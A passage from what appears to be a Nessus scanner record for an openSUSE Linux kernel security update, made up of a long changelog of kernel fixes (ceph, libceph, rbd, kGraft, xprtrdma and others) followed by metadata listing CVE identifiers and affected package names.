(Fate#318586).\n\n - ceph: add missing init_acl() for mkdir() and atomic_open() (Fate#318586).\n\n - ceph: add open export target session helper (Fate#318586).\n\n - ceph: add request to i_unsafe_dirops when getting unsafe reply (Fate#318586).\n\n - ceph: additional debugfs output (Fate#318586).\n\n - ceph: always re-send cap flushes when MDS recovers (Fate#318586).\n\n - ceph: avoid block operation when !TASK_RUNNING (ceph_mdsc_close_sessions) (Fate#318586).\n\n - ceph: avoid block operation when !TASK_RUNNING (ceph_get_caps) (Fate#318586).\n\n - ceph: avoid block operation when !TASK_RUNNING (ceph_mdsc_sync) (Fate#318586).\n\n - ceph: avoid releasing caps that are being used (Fate#318586).\n\n - ceph: avoid sending unnessesary FLUSHSNAP message (Fate#318586).\n\n - ceph: avoid useless ceph_get_dentry_parent_inode() in ceph_rename() (Fate#318586).\n\n - ceph: cast PAGE_SIZE to size_t in ceph_sync_write() (Fate#318586).\n\n - ceph: ceph_frag_contains_value can be boolean (Fate#318586).\n\n - ceph: ceph_get_parent() can be static (Fate#318586).\n\n - ceph: check OSD caps before read/write (Fate#318586).\n\n - ceph: check buffer size in ceph_vxattrcb_layout() (Fate#318586).\n\n - ceph: check caps in filemap_fault and page_mkwrite (Fate#318586).\n\n - ceph: check directory's completeness before emitting directory entry (Fate#318586).\n\n - ceph: check inode caps in ceph_d_revalidate (Fate#318586).\n\n - ceph: check unsupported fallocate mode (Fate#318586).\n\n - ceph: check zero length in ceph_sync_read() (Fate#318586).\n\n - ceph: checking for IS_ERR instead of NULL (Fate#318586).\n\n - ceph: cleanup unsafe requests when reconnecting is denied (Fate#318586).\n\n - ceph: cleanup use of ceph_msg_get (Fate#318586).\n\n - ceph: clear directory's completeness when creating file (Fate#318586).\n\n - ceph: convert inline data to normal data before data write (Fate#318586).\n\n - ceph: do not assume r_old_dentry[_dir] always set together (Fate#318586).\n\n - ceph: do not chain inode updates to parent fsync (Fate#318586).\n\n - ceph: do not grabs open file reference for aborted request (Fate#318586).\n\n - ceph: do not include ceph.(file,dir).layout vxattr in listxattr() (Fate#318586).\n\n - ceph: do not include used caps in cap_wanted (Fate#318586).\n\n - ceph: do not invalidate page cache when inode is no longer used (Fate#318586).\n\n - ceph: do not mark dirty caps when there is no auth cap (Fate#318586).\n\n - ceph: do not pre-allocate space for cap release messages (Fate#318586).\n\n - ceph: do not set r_old_dentry_dir on link() (Fate#318586).\n\n - ceph: do not trim auth cap when there are cap snaps (Fate#318586).\n\n - ceph: do not zero i_wrbuffer_ref when reconnecting is denied (Fate#318586).\n\n - ceph: drop cap releases in requests composed before cap reconnect (Fate#318586).\n\n - ceph: drop extra open file reference in ceph_atomic_open() (Fate#318586).\n\n - ceph: drop unconnected inodes (Fate#318586).\n\n - ceph: exclude setfilelock requests when calculating oldest tid (Fate#318586).\n\n - ceph: export ceph_session_state_name function (Fate#318586).\n\n - ceph: fetch inline data when getting Fcr cap refs (Fate#318586).\n\n - ceph: fix __dcache_readdir() (Fate#318586).\n\n - ceph: fix a comment typo (Fate#318586).\n\n - ceph: fix append mode write (Fate#318586).\n\n - ceph: fix atomic_open snapdir (Fate#318586).\n\n - ceph: fix bool assignments (Fate#318586).\n\n - ceph: fix cache revoke race (Fate#318586).\n\n - ceph: fix ceph_dir_llseek() (Fate#318586).\n\n - ceph: fix ceph_fh_to_parent() (Fate#318586).\n\n - ceph: fix ceph_removexattr() (Fate#318586).\n\n - ceph: fix ceph_set_acl() (Fate#318586).\n\n - ceph: fix ceph_writepages_start() (Fate#318586).\n\n - ceph: fix dcache/nocache mount option (Fate#318586).\n\n - ceph: fix dentry leaks (Fate#318586).\n\n - ceph: fix directory fsync (Fate#318586).\n\n - ceph: fix divide-by-zero in __validate_layout() (Fate#318586).\n\n - ceph: fix double page_unlock() in page_mkwrite() (Fate#318586).\n\n - ceph: fix dout() compile warnings in ceph_filemap_fault() (Fate#318586).\n\n - ceph: fix file lock interruption (Fate#318586).\n\n - ceph: fix flush tid comparision (Fate#318586).\n\n - ceph: fix flushing caps (Fate#318586).\n\n - ceph: fix llistxattr on symlink (Fate#318586).\n\n - ceph: fix message length computation (Fate#318586).\n\n - ceph: fix mksnap crash (Fate#318586).\n\n - ceph: fix NULL pointer dereference in send_mds_reconnect() (Fate#318586).\n\n - ceph: fix pr_fmt() redefinition (Fate#318586).\n\n - ceph: fix queuing inode to mdsdir's snaprealm (Fate#318586).\n\n - ceph: fix reading inline data when i_size > PAGE_SIZE (Fate#318586).\n\n - ceph: fix request time stamp encoding (Fate#318586).\n\n - ceph: fix reset_readdir() (Fate#318586).\n\n - ceph: fix setting empty extended attribute (Fate#318586).\n\n - ceph: fix sizeof(struct tYpO *) typo (Fate#318586).\n\n - ceph: fix snap context leak in error path (Fate#318586).\n\n - ceph: fix trim caps (Fate#318586).\n\n - ceph: fix uninline data function (Fate#318586).\n\n - ceph: flush cap release queue when trimming session caps (Fate#318586).\n\n - ceph: flush inline version (Fate#318586).\n\n - ceph: forbid mandatory file lock (Fate#318586).\n\n - ceph: fscache: Update object store limit after file writing (Fate#318586).\n\n - ceph: fscache: Wait for completion of object initialization (Fate#318586).\n\n - ceph: fscache: add an interface to synchronize object store limit (Fate#318586).\n\n - ceph: get inode size for each append write (Fate#318586).\n\n - ceph: handle -ESTALE reply (Fate#318586).\n\n - ceph: handle SESSION_FORCE_RO message (Fate#318586).\n\n - ceph: handle cap export race in try_flush_caps() (Fate#318586).\n\n - ceph: handle cap import atomically (Fate#318586).\n\n - ceph: handle frag mismatch between readdir request and reply (Fate#318586).\n\n - ceph: handle race between cap reconnect and cap release (Fate#318586).\n\n - ceph: handle session flush message (Fate#318586).\n\n - ceph: hold on to exclusive caps on complete directories (Fate#318586).\n\n - ceph: implement readv/preadv for sync operation (Fate#318586).\n\n - ceph: improve readahead for file holes (Fate#318586).\n\n - ceph: improve reference tracking for snaprealm (Fate#318586).\n\n - ceph: include time stamp in every MDS request (Fate#318586).\n\n - ceph: include time stamp in replayed MDS requests (Fate#318586).\n\n - ceph: initial CEPH_FEATURE_FS_FILE_LAYOUT_V2 support (Fate#318586).\n\n - ceph: initialize inode before instantiating dentry (Fate#318586).\n\n - ceph: introduce a new inode flag indicating if cached dentries are ordered (Fate#318586).\n\n - ceph: introduce ceph_fill_fragtree() (Fate#318586).\n\n - ceph: introduce global empty snap context (Fate#318586).\n\n - ceph: invalidate dirty pages after forced umount (Fate#318586).\n\n - ceph: keep i_snap_realm while there are writers (Fate#318586).\n\n - ceph: kstrdup() memory handling (Fate#318586).\n\n - ceph: let MDS adjust readdir 'frag' (Fate#318586).\n\n - ceph: make ceph_forget_all_cached_acls() static inline (Fate#318586).\n\n - ceph: make fsync() wait unsafe requests that created/modified inode (Fate#318586).\n\n - ceph: make sure syncfs flushes all cap snaps (Fate#318586).\n\n - ceph: make sure write caps are registered with auth MDS (Fate#318586).\n\n - ceph: match wait_for_completion_timeout return type (Fate#318586).\n\n - ceph: message versioning fixes (Fate#318586).\n\n - ceph: move ceph_find_inode() outside the s_mutex (Fate#318586).\n\n - ceph: move spinlocking into ceph_encode_locks_to_buffer and ceph_count_locks (Fate#318586).\n\n - ceph: no need to get parent inode in ceph_open (Fate#318586).\n\n - ceph: parse inline data in MClientReply and MClientCaps (Fate#318586).\n\n - ceph: pre-allocate ceph_cap struct for ceph_add_cap() (Fate#318586).\n\n - ceph: pre-allocate data structure that tracks caps flushing (Fate#318586).\n\n - ceph: preallocate buffer for readdir reply (Fate#318586).\n\n - ceph: print inode number for LOOKUPINO request (Fate#318586).\n\n - ceph: properly apply umask when ACL is enabled (Fate#318586).\n\n - ceph: properly handle XATTR_CREATE and XATTR_REPLACE (Fate#318586).\n\n - ceph: properly mark empty directory as complete (Fate#318586).\n\n - ceph: properly release page upon error (Fate#318586).\n\n - ceph: properly zero data pages for file holes (Fate#318586).\n\n - ceph: provide separate (inode,file)_operations for snapdir (Fate#318586).\n\n - ceph: queue cap release in __ceph_remove_cap() (Fate#318586).\n\n - ceph: queue vmtruncate if necessary when handing cap grant/revoke (Fate#318586).\n\n - ceph: ratelimit warn messages for MDS closes session (Fate#318586).\n\n - ceph: re-send AIO write request when getting -EOLDSNAP error (Fate#318586).\n\n - ceph: re-send flushing caps (which are revoked) in reconnect stage (Fate#318586).\n\n - ceph: re-send requests when MDS enters reconnecting stage (Fate#318586).\n\n - ceph: refactor readpage_nounlock() to make the logic clearer (Fate#318586).\n\n - ceph: remember subtree root dirfrag's auth MDS (Fate#318586).\n\n - ceph: remove exported caps when handling cap import message (Fate#318586).\n\n - ceph: remove outdated frag information (Fate#318586).\n\n - ceph: remove redundant code for max file size verification (Fate#318586).\n\n - ceph: remove redundant declaration (Fate#318586).\n\n - ceph: remove redundant memset(0) (Fate#318586).\n\n - ceph: remove redundant test of head->safe and silence static analysis warnings (Fate#318586).\n\n - ceph: remove the useless judgement (Fate#318586).\n\n - ceph: remove unused functions in ceph_frag.h (Fate#318586).\n\n - ceph: remove unused stringification macros (Fate#318586).\n\n - ceph: remove useless ACL check (Fate#318586).\n\n - ceph: remove xattr when null value is given to setxattr() (Fate#318586).\n\n - ceph: rename snapshot support (Fate#318586).\n\n - ceph: replace comma with a semicolon (Fate#318586).\n\n - ceph: request xattrs if xattr_version is zero (Fate#318586).\n\n - ceph: reserve caps for file layout/lock MDS requests (Fate#318586).\n\n - ceph: reset r_resend_mds after receiving -ESTALE (Fate#318586).\n\n - ceph: return error for traceless reply race (Fate#318586).\n\n - ceph: rework dcache readdir (Fate#318586).\n\n - ceph: send TID of the oldest pending caps flush to MDS (Fate#318586).\n\n - ceph: send client metadata to MDS (Fate#318586).\n\n - ceph: set caps count after composing cap reconnect message (Fate#318586).\n\n - ceph: set i_head_snapc when getting CEPH_CAP_FILE_WR reference (Fate#318586).\n\n - ceph: set mds_wanted when MDS reply changes a cap to auth cap (Fate#318586).\n\n - ceph: show nocephx_require_signatures and notcp_nodelay options (Fate#318586).\n\n - ceph: show non-default options only (Fate#318586).\n\n - ceph: simplify ceph_fh_to_dentry() (Fate#318586).\n\n - ceph: simplify two mount_timeout sites (Fate#318586).\n\n - ceph: skip invalid dentry during dcache readdir (Fate#318586).\n\n - ceph: support inline data feature (Fate#318586).\n\n - ceph: switch some GFP_NOFS memory allocation to GFP_KERNEL (Fate#318586).\n\n - ceph: sync read inline data (Fate#318586).\n\n - ceph: take snap_rwsem when accessing snap realm's cached_context (Fate#318586).\n\n - ceph: track pending caps flushing accurately (Fate#318586).\n\n - ceph: track pending caps flushing globally (Fate#318586).\n\n - ceph: trim unused inodes before reconnecting to recovering MDS (Fate#318586).\n\n - ceph: trivial comment fix (Fate#318586).\n\n - ceph: update i_max_size even if inode version does not change (Fate#318586).\n\n - ceph: update inode fields according to issued caps (Fate#318586).\n\n - ceph: use %zu for len in ceph_fill_inline_data() (Fate#318586).\n\n - ceph: use ceph_seq_cmp() to compare migrate_seq (Fate#318586).\n\n - ceph: use empty snap context for uninline_data and get_pool_perm (Fate#318586).\n\n - ceph: use fl->fl_file as owner identifier of flock and posix lock (Fate#318586).\n\n - ceph: use fl->fl_type to decide flock operation (Fate#318586).\n\n - ceph: use fpos_cmp() to compare dentry positions (Fate#318586).\n\n - ceph: use getattr request to fetch inline data (Fate#318586).\n\n - ceph: use i_size_(read,write) to get/set i_size (Fate#318586).\n\n - ceph: use msecs_to_jiffies for time conversion (Fate#318586).\n\n - ceph: use pagelist to present MDS request data (Fate#318586).\n\n - ceph: use truncate_pagecache() instead of truncate_inode_pages() (Fate#318586).\n\n - ceph_sync_(,direct_)write: fix an oops on ceph_osdc_new_request() failure (Fate#318586).\n\n - client: include kernel version in client metadata (Fate#318586).\n\n - cpuset: Fix potential deadlock w/ set_mems_allowed (bsc#960857, bsc#974646).\n\n - crush: add chooseleaf_stable tunable (Fate#318586).\n\n - crush: decode and initialize chooseleaf_stable (Fate#318586).\n\n - crush: ensure bucket id is valid before indexing buckets array (Fate#318586).\n\n - crush: ensure take bucket value is valid (Fate#318586).\n\n - crush: fix crash from invalid 'take' argument (Fate#318586).\n\n - crush: sync up with userspace (Fate#318586).\n\n - crypto: testmgr - allow rfc3686 aes-ctr variants in fips mode (bsc#958390).\n\n - crypto: testmgr - mark authenticated ctr(aes) also as FIPS able (bsc#958390).\n\n - dasd: fix hanging system after LCU changes (bnc#968497, LTC#136671).\n\n - drm/core: Preserve the framebuffer after removing it (bsc#968812).\n\n - drm/i915: do not warn if backlight unexpectedly enabled (boo#972068).\n\n - drm/i915: set backlight duty cycle after backlight enable for gen4 (boo#972780).\n\n - drm/radeon: fix-up some float to fixed conversion thinkos (bsc#968813).\n\n - drm/radeon: use HDP_MEM_COHERENCY_FLUSH_CNTL for sdma as well (bsc#968813).\n\n - ext4: Fix softlockups in SEEK_HOLE and SEEK_DATA implementations (bsc#942262).\n\n - ext4: fix races between page faults and hole punching (bsc#972174).\n\n - ext4: fix races of writeback with punch hole and zero range (bsc#972174).\n\n - fs, seq_file: fallback to vmalloc instead of oom kill processes (bnc#968687).\n\n - fs, seqfile: always allow oom killer (bnc#968687).\n\n - fs/ceph/debugfs.c: replace seq_printf by seq_puts (Fate#318586).\n\n - fs/ceph: replace pr_warning by pr_warn (Fate#318586).\n\n - fs/pipe.c: skip file_update_time on frozen fs (bsc#975488).\n\n - ibmvscsi: Remove unsupported host config MAD (bsc#973556).\n\n - iommu/vt-d: Improve fault handler error messages (bsc#975772).\n\n - iommu/vt-d: Ratelimit fault handler (bsc#975772).\n\n - ipv6: make fib6 serial number per namespace (bsc#965319).\n\n - ipv6: per netns FIB garbage collection (bsc#965319).\n\n - ipv6: per netns fib6 walkers (bsc#965319).\n\n - ipv6: replace global gc_args with local variable (bsc#965319).\n\n - kABI: kgr: fix subtle race with kgr_module_init(), going notifier and kgr_modify_kernel().\n\n - kABI: protect function file_open_root.\n\n - kABI: protect include in evm.\n\n - kABI: protect struct user_struct.\n\n - kabi fix for patches.fixes/reduce-m_start-cost (bsc#966573).\n\n - kabi/severities: Allow changes in zpci_* symbols (bsc#974692)\n\n - kabi/severities: Whitelist libceph and rbd (bsc#964727).\n\n - kabi/severities: Whitelist libceph and rbd (fate#318586).\n\n - kabi: kgr, add reserved fields (fate#313296).\n\n - kabi: protect struct fc_rport_priv (bsc#953233, bsc#962846).\n\n - kabi: protect struct netns_ipv6 after FIB6 GC series (bsc#965319).\n\n - kgr: add TAINT_KGRAFT (fate#313296).\n\n - kgr: add kgraft annotation to hwrng kthread (fate#313296).\n\n - kgr: add kgraft annotations to kthreads' wait_event_freezable() API calls (fate#313296).\n\n - kgr: add objname to kgr_patch_fun struct (fate#313296).\n\n - kgr: add sympos and objname to error and debug messages (fate#313296).\n\n - kgr: add sympos as disambiguator field to kgr_patch_fun structure (fate#313296).\n\n - kgr: add sympos to sysfs (fate#313296).\n\n - kgr: call kgr_init_ftrace_ops() only for loaded objects (fate#313296).\n\n - kgr: change to kallsyms_on_each_symbol iterator (fate#313296).\n\n - kgr: define pr_fmt and modify all pr_* messages (fate#313296).\n\n - kgr: do not print error for !abort_if_missing symbols (bnc#943989).\n\n - kgr: do not return and print an error only if the object is not loaded (fate#313296).\n\n - kgr: do not use WQ_MEM_RECLAIM workqueue (bnc#963572).\n\n - kgr: fix an asymmetric dealing with delayed module loading (fate#313296).\n\n - kgr: fix redirection on s390x arch (bsc#903279).\n\n - kgr: fix reversion of a patch already reverted by a replace_all patch (fate#313296).\n\n - kgr: fix subtle race with kgr_module_init(), going notifier and kgr_modify_kernel() (fate#313296).\n\n - kgr: handle btrfs kthreads (fate#313296 bnc#889207).\n\n - kgr: kmemleak, really mark the kthread safe after an interrupt (fate#313296).\n\n - kgr: log when modifying kernel (fate#317827).\n\n - kgr: mark kernel unsupported upon patch revert (fate#313296).\n\n - kgr: mark some more missed kthreads (bnc#962336).\n\n - kgr: remove abort_if_missing flag (fate#313296).\n\n - kgr: usb/storage: do not emit thread awakened (bnc#899908).\n\n - kgraft/gfs2: Do not block livepatching in the log daemon for too long (fate#313296).\n\n - kgraft/xen: Do not block livepatching in the XEN blkif kthread (fate#313296).\n\n - libceph: Avoid holding the zero page on ceph_msgr_slab_init errors (Fate#318586).\n\n - libceph: Fix ceph_tcp_sendpage()'s more boolean usage (Fate#318586).\n\n - libceph: MOSDOpReply v7 encoding (Fate#318586).\n\n - libceph: Remove spurious kunmap() of the zero page (Fate#318586).\n\n - libceph: a couple tweaks for wait loops (Fate#318586).\n\n - libceph: add nocephx_sign_messages option (Fate#318586).\n\n - libceph: advertise support for TUNABLES5 (Fate#318586).\n\n - libceph: advertise support for keepalive2 (Fate#318586).\n\n - libceph: allow setting osd_req_op's flags (Fate#318586).\n\n - libceph: check data_len in ->alloc_msg() (Fate#318586).\n\n - libceph: clear messenger auth_retry flag if we fault (Fate#318586).\n\n - libceph: clear msg->con in ceph_msg_release() only (Fate#318586).\n\n - libceph: do not access invalid memory in keepalive2 path (Fate#318586).\n\n - libceph: do not spam dmesg with stray reply warnings (Fate#318586).\n\n - libceph: drop authorizer check from cephx msg signing routines (Fate#318586).\n\n - libceph: evaluate osd_req_op_data() arguments only once (Fate#318586).\n\n - libceph: fix authorizer invalidation, take 2 (Fate#318586).\n\n - libceph: fix ceph_msg_revoke() (Fate#318586).\n\n - libceph: fix wrong name 'Ceph filesystem for Linux' (Fate#318586).\n\n - libceph: handle writefull for OSD op extent init (bsc#980706).\n\n - libceph: introduce ceph_x_authorizer_cleanup() (Fate#318586).\n\n - libceph: invalidate AUTH in addition to a service ticket (Fate#318586).\n\n - libceph: kill off ceph_x_ticket_handler::validity (Fate#318586).\n\n - libceph: move ceph_file_layout helpers to ceph_fs.h (Fate#318586).\n\n - libceph: msg signing callouts do not need con argument (Fate#318586).\n\n - libceph: nuke time_sub() (Fate#318586).\n\n - libceph: properly release STAT request's raw_data_in (Fate#318586).\n\n - libceph: remove con argument in handle_reply() (Fate#318586).\n\n - libceph: remove outdated comment (Fate#318586).\n\n - libceph: remove the unused macro AES_KEY_SIZE (Fate#318586).\n\n - libceph: rename con_work() to ceph_con_workfn() (Fate#318586).\n\n - libceph: set 'exists' flag for newly up osd (Fate#318586).\n\n - libceph: stop duplicating client fields in messenger (Fate#318586).\n\n - libceph: store timeouts in jiffies, verify user input (Fate#318586).\n\n - libceph: treat sockaddr_storage with uninitialized family as blank (Fate#318586).\n\n - libceph: use keepalive2 to verify the mon session is alive (Fate#318586).\n\n - libceph: use list_for_each_entry_safe (Fate#318586).\n\n - libceph: use list_next_entry instead of list_entry_next (Fate#318586).\n\n - libceph: use local variable cursor instead of msg->cursor (Fate#318586).\n\n - libceph: use the right footer size when skipping a message (Fate#318586).\n\n - libfc: replace 'rp_mutex' with 'rp_lock' (bsc#953233, bsc#962846).\n\n - mds: check cap ID when handling cap export message (Fate#318586).\n\n - mmc: Allow forward compatibility for eMMC (bnc#966054).\n\n - mmc: sdhci: Allow for irq being shared (bnc#977582).\n\n - mpt3sas: Fix use sas_is_tlr_enabled API before enabling MPI2_SCSIIO_CONTROL_TLR_ON flag (bsc#967640).\n\n - nfs-rdma: Fix for FMR leaks (bsc#908151).\n\n - nfs: fix high load average due to callback thread sleeping (bsc#971170).\n\n - nvme: fix max_segments integer truncation (bsc#976471).\n\n - ocfs2: do not set fs read-only if rec[0] is empty while committing truncate (bnc#971947).\n\n - ocfs2: extend enough credits for freeing one truncate record while replaying truncate records (bnc#971947).\n\n - ocfs2: extend transaction for ocfs2_remove_rightmost_path() and ocfs2_update_edge_lengths() before to avoid inconsistency between inode and et (bnc#971947).\n\n - pipe: limit the per-user amount of pages allocated in pipes (bsc#970948).\n\n - powerpc/book3s64: Fix branching to OOL handlers in relocatable kernel (bsc@976821).\n\n - powerpc/book3s64: Remove __end_handlers marker (bsc#976821).\n\n - rbd: bump queue_max_segments (Fate#318586).\n\n - rbd: delete an unnecessary check before rbd_dev_destroy() (Fate#318586).\n\n - rbd: do not free rbd_dev outside of the release callback (Fate#318586).\n\n - rbd: do not put snap_context twice in rbd_queue_workfn() (Fate#318586).\n\n - rbd: drop null test before destroy functions (Fate#318586).\n\n - rbd: handle OBJ_REQUEST_SG types for copyup (bsc#983394).\n\n - rbd: plug rbd_dev->header.object_prefix memory leak (Fate#318586).\n\n - rbd: rbd_wq comment is obsolete (Fate#318586).\n\n - rbd: remove duplicate calls to rbd_dev_mapping_clear() (Fate#318586).\n\n - rbd: report unsupported features to syslog (bsc#979169).\n\n - rbd: return -ENOMEM instead of pool id if rbd_dev_create() fails (Fate#318586).\n\n - rbd: set device_type::release instead of device::release (Fate#318586).\n\n - rbd: set max_sectors explicitly (Fate#318586).\n\n - rbd: store rbd_options in rbd_device (Fate#318586).\n\n - rbd: terminate rbd_opts_tokens with Opt_err (Fate#318586).\n\n - rbd: timeout watch teardown on unmap with mount_timeout (Fate#318586).\n\n - rbd: use GFP_NOIO consistently for request allocations (bsc#971159).\n\n - rbd: use writefull op for object size writes (Fate#318586).\n\n - reduce m_start() cost.. (bsc#966573).\n\n - rpm/modprobe-xen.conf: Revert comment change to allow parallel install (bsc#957986). This reverts commit 6c6d86d3cdc26f7746fe4ba2bef8859b5aeb346c.\n\n - s390/compat: correct restore of high gprs on signal return (bnc#968497, LTC#137571).\n\n - s390/pageattr: do a single TLB flush for change_page_attr (bsc#940413).\n\n - s390/pci: add extra padding to function measurement block (bnc#974692, LTC#139445).\n\n - s390/pci: enforce fmb page boundary rule (bnc#974692, LTC#139445).\n\n - s390/pci: extract software counters from fmb (bnc#974692, LTC#139445).\n\n - s390/pci: remove pdev pointer from arch data (bnc#974692, LTC#139444).\n\n - s390/pci_dma: fix DMA table corruption with > 4 TB main memory (bnc#974692, LTC#139401).\n\n - s390/pci_dma: handle dma table failures (bnc#974692, LTC#139442).\n\n - s390/pci_dma: improve debugging of errors during dma map (bnc#974692, LTC#139442).\n\n - s390/pci_dma: unify label of invalid translation table entries (bnc#974692, LTC#139442).\n\n - s390/zcrypt: HWRNG registration cause kernel panic on CEX hotplug (bnc#968497, LTC#138409).\n\n - scsi-bnx2fc-handle_scsi_retry_delay\n\n - scsi-bnx2fc-soft_lockup_when_rmmod\n\n - scsi: Add intermediate STARGET_REMOVE state to scsi_target_state (bsc#970609).\n\n - scsi: Avoid crashing if device uses DIX but adapter does not support it (bsc#969016).\n\n - sd: get disk reference in sd_check_events() (bnc#897662).\n\n - supported.conf :\n\n - supported.conf: Add bridge.ko for OpenStack (bsc#971600)\n\n - supported.conf: add pci-hyperv\n\n - supported.conf:Add drivers/infiniband/hw/ocrdma/ocrdma.ko to supported.conf (bsc#964461)\n\n - svcrdma: Fence LOCAL_INV work requests (bsc#908151).\n\n - svcrdma: advertise the correct max payload (bsc#908151).\n\n - svcrdma: fix offset calculation for non-page aligned sge entries (bsc#908151).\n\n - svcrdma: fix printk when memory allocation fails (bsc#908151).\n\n - svcrdma: refactor marshalling logic (bsc#908151).\n\n - svcrdma: send_write() must not overflow the device's max sge (bsc#908151).\n\n - target/rbd: do not put snap_context twice (bsc#981143).\n\n - target/rbd: remove caw_mutex usage (bsc#981143).\n\n - target: Drop incorrect ABORT_TASK put for completed commands (bsc#962872).\n\n - target: Fix LUN_RESET active I/O handling for ACK_KREF (bsc#962872).\n\n - target: Fix LUN_RESET active TMR descriptor handling (bsc#962872).\n\n - target: Fix TAS handling for multi-session se_node_acls (bsc#962872).\n\n - target: Fix race with SCF_SEND_DELAYED_TAS handling (bsc#962872).\n\n - target: Fix remote-port TMR ABORT + se_cmd fabric stop (bsc#962872).\n\n - tcp: convert cached rtt from usec to jiffies when feeding initial rto (bsc#937086).\n\n - vgaarb: Add more context to error messages (bsc#976868).\n\n - xen/acpi: Disable ACPI table override when UEFI Secure Boot is enabled (bsc#970604).\n\n - xen: Linux 3.12.58.\n\n - xprtrdma: Allocate missing pagelist (bsc#908151).\n\n - xprtrdma: Avoid deadlock when credit window is reset (bsc#908151).\n\n - xprtrdma: Disconnect on registration failure (bsc#908151).\n\n - xprtrdma: Ensure ia->ri_id->qp is not NULL when reconnecting (bsc#908151).\n\n - xprtrdma: Fall back to MTHCAFMR when FRMR is not supported (bsc#908151).\n\n - xprtrdma: Limit work done by completion handler (bsc#908151).\n\n - xprtrdma: Make rpcrdma_ep_destroy() return void (bsc#908151).\n\n - xprtrdma: RPC/RDMA must invoke xprt_wake_pending_tasks() in process context (bsc#908151).\n\n - xprtrdma: Reduce the number of hardway buffer allocations (bsc#908151).\n\n - xprtrdma: Remove BOUNCEBUFFERS memory registration mode (bsc#908151).\n\n - xprtrdma: Remove BUG_ON() call sites (bsc#908151).\n\n - xprtrdma: Remove MEMWINDOWS registration modes (bsc#908151).\n\n - xprtrdma: Remove REGISTER memory registration mode (bsc#908151).\n\n - xprtrdma: Remove Tavor MTU setting (bsc#908151).\n\n - xprtrdma: Reset connection timeout after successful reconnect (bsc#908151).\n\n - xprtrdma: Simplify rpcrdma_deregister_external() synopsis (bsc#908151).\n\n - xprtrdma: Split the completion queue (bsc#908151).\n\n - xprtrdma: Use macros for reconnection timeout constants (bsc#908151).\n\n - xprtrdma: mind the device's max fast register page list depth (bsc#908151).\n\n - xprtrdma: mount reports 'Invalid mount option' if memreg mode not supported (bsc#908151).\n\n - xprtrmda: Reduce calls to ib_poll_cq() in completion handlers (bsc#908151).\n\n - xprtrmda: Reduce lock contention in completion handlers (bsc#908151).", "cvss3": {}, "published": "2016-07-12T00:00:00", "type": "nessus", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2016-862)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9717", "CVE-2015-8539", "CVE-2015-8816", "CVE-2016-1583", "CVE-2016-2143", "CVE-2016-2184", "CVE-2016-2185", "CVE-2016-2186", "CVE-2016-2188", "CVE-2016-2782", "CVE-2016-2847", "CVE-2016-3134", "CVE-2016-3136", "CVE-2016-3137", "CVE-2016-3138", "CVE-2016-3140", "CVE-2016-3156", "CVE-2016-3689", "CVE-2016-3951", "CVE-2016-4482", "CVE-2016-4486", "CVE-2016-4569", "CVE-2016-4997"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ipset-kmp-desktop", "p-cpe:/a:novell:opensuse:ipset-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-pae", "p-cpe:/a:novell:opensuse:ipset-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-xen", "p-cpe:/a:novell:opensuse:ipset-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget", "p-cpe:/a:novell:opensuse:iscsitarget-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-debugsource", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-default", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", 